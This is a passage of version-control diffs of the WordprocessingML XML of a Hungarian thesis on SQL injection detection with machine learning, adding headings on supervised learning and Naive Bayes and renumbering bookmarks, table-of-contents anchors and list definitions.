+        <w:t>(3)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Cmsor2"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:ind w:left="426" w:hanging="426"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="13" w:name="_Toc71019999"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Felügyelt tanulás</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="13"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Mi a felügyelt tanulás?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Hogyan működik a felügyelt tanulás?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Felügyelt tanulási algoritmusok (7)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>F</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>elügyelt tanulás során c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ímkézett adatkészletek felhasználásával algoritmusokat képeznek, amelyek pontosan osztályozzák az adatokat vagy előre jelzik az eredményeket.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Ez a típusú</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> tanulás segít a szervezeteknek számos valós problémát megoldani, például a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> fent említett hálózati forgalom osztályozás</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a által.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Stlus3"/>
+        <w:ind w:left="709" w:hanging="709"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="14" w:name="_Toc71020000"/>
+      <w:r>
+        <w:t>Naive Bayes</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="14"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
@@ -6821,11 +7332,11 @@
         </w:numPr>
         <w:ind w:left="284" w:hanging="284"/>
       </w:pPr>
-      <w:bookmarkStart w:id="13" w:name="_Toc70961907"/>
+      <w:bookmarkStart w:id="15" w:name="_Toc71020001"/>
       <w:r>
         <w:t>PROGRAM FELÉPÍTÉSE</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="13"/>
+      <w:bookmarkEnd w:id="15"/>
     </w:p>
     <w:p/>
     <w:p>
@@ -6852,11 +7363,11 @@
         </w:numPr>
         <w:ind w:left="284" w:hanging="284"/>
       </w:pPr>
-      <w:bookmarkStart w:id="14" w:name="_Toc70961908"/>
+      <w:bookmarkStart w:id="16" w:name="_Toc71020002"/>
       <w:r>
         <w:t>EREDMÉNY ÉS ANALÍZIS</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="14"/>
+      <w:bookmarkEnd w:id="16"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6911,7 +7422,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="15" w:name="_Toc70961909"/>
+      <w:bookmarkStart w:id="17" w:name="_Toc71020003"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6921,7 +7432,7 @@
         </w:rPr>
         <w:t>Irodalomjegyzék</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="15"/>
+      <w:bookmarkEnd w:id="17"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6974,7 +7485,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="16" w:name="_Toc70961910"/>
+      <w:bookmarkStart w:id="18" w:name="_Toc71020004"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6984,7 +7495,7 @@
         </w:rPr>
         <w:t>Nyilatkozat</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="16"/>
+      <w:bookmarkEnd w:id="18"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7159,7 +7670,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="17" w:name="_Toc70961911"/>
+      <w:bookmarkStart w:id="19" w:name="_Toc71020005"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -7169,7 +7680,7 @@
         </w:rPr>
         <w:t>Köszönetnyilvánítás</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="17"/>
+      <w:bookmarkEnd w:id="19"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -8282,6 +8793,119 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="61BF323C"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="EA52E50E"/>
+    <w:lvl w:ilvl="0" w:tplc="040E0001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1287" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="040E0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2007" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="040E0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2727" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="040E0001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3447" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="040E0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4167" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="040E0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4887" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="040E0001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5607" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="040E0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6327" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="040E0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="7047" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="66C264D6"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="CD9A3D8E"/>
@@ -8394,7 +9018,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="79BB3A78"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="76AE7DE8"/>
@@ -8517,7 +9141,7 @@
     <w:abstractNumId w:val="5"/>
   </w:num>
   <w:num w:numId="4">
-    <w:abstractNumId w:val="8"/>
+    <w:abstractNumId w:val="9"/>
   </w:num>
   <w:num w:numId="5">
     <w:abstractNumId w:val="3"/>
@@ -8535,7 +9159,10 @@
     <w:abstractNumId w:val="2"/>
   </w:num>
   <w:num w:numId="10">
-    <w:abstractNumId w:val="9"/>
+    <w:abstractNumId w:val="10"/>
+  </w:num>
+  <w:num w:numId="11">
+    <w:abstractNumId w:val="8"/>
   </w:num>
 </w:numbering>
 </file>

</xml_diff>

<commit_message>
Writing about machine learning
</commit_message>
<xml_diff>
--- a/szakdolgozat.docx
+++ b/szakdolgozat.docx
@@ -154,8 +154,174 @@
           <w:szCs w:val="32"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>SQL injection detection using natural language processing systems and machine learning</w:t>
-      </w:r>
+        <w:t xml:space="preserve">SQL injection </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>detection</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>using</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>natural</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>language</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>processing</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>systems</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>machine</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>learning</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -660,7 +826,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc71019988"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc71124903"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -739,7 +905,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc71019989"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc71124904"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -873,15 +1039,33 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>egy kód SQL injection</w:t>
-      </w:r>
+        <w:t xml:space="preserve">egy kód SQL </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i w:val="0"/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">beli </w:t>
+        <w:t>injection</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>beli</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1015,6 +1199,7 @@
         </w:rPr>
         <w:t xml:space="preserve">A </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i w:val="0"/>
@@ -1023,6 +1208,7 @@
         </w:rPr>
         <w:t>IntelliJ</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:i w:val="0"/>
@@ -1316,8 +1502,9 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> train/test készlet,</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -1326,8 +1513,9 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
+        <w:t>train</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -1336,7 +1524,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>K-Fold</w:t>
+        <w:t>/test készlet,</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1346,7 +1534,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1356,7 +1544,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>c</w:t>
+        <w:t>K-Fold</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1366,8 +1554,9 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">onfusion mátrix, </w:t>
-      </w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -1376,7 +1565,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>r</w:t>
+        <w:t>c</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1386,8 +1575,9 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>ecal</w:t>
-      </w:r>
+        <w:t>onfusion</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -1396,8 +1586,40 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t xml:space="preserve"> mátrix, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs/>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>r</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs/>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ecal</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs/>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t>l</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -1457,7 +1679,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:bookmarkStart w:id="4" w:name="_Toc71019990"/>
+          <w:bookmarkStart w:id="4" w:name="_Toc71124905"/>
           <w:r>
             <w:rPr>
               <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1509,7 +1731,7 @@
             </w:rPr>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
-          <w:hyperlink w:anchor="_Toc71019988" w:history="1">
+          <w:hyperlink w:anchor="_Toc71124903" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -1537,7 +1759,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71019988 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71124903 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1582,7 +1804,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71019989" w:history="1">
+          <w:hyperlink w:anchor="_Toc71124904" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -1610,7 +1832,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71019989 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71124904 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1655,7 +1877,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71019990" w:history="1">
+          <w:hyperlink w:anchor="_Toc71124905" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -1683,7 +1905,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71019990 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71124905 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1728,7 +1950,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71019991" w:history="1">
+          <w:hyperlink w:anchor="_Toc71124906" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -1756,7 +1978,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71019991 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71124906 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1802,7 +2024,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71019992" w:history="1">
+          <w:hyperlink w:anchor="_Toc71124907" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -1846,7 +2068,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71019992 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71124907 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1892,7 +2114,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71019993" w:history="1">
+          <w:hyperlink w:anchor="_Toc71124908" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -1938,7 +2160,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71019993 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71124908 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1984,7 +2206,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71019994" w:history="1">
+          <w:hyperlink w:anchor="_Toc71124909" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2028,7 +2250,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71019994 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71124909 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2074,7 +2296,7 @@
               <w:lang w:val="hu-HU"/>
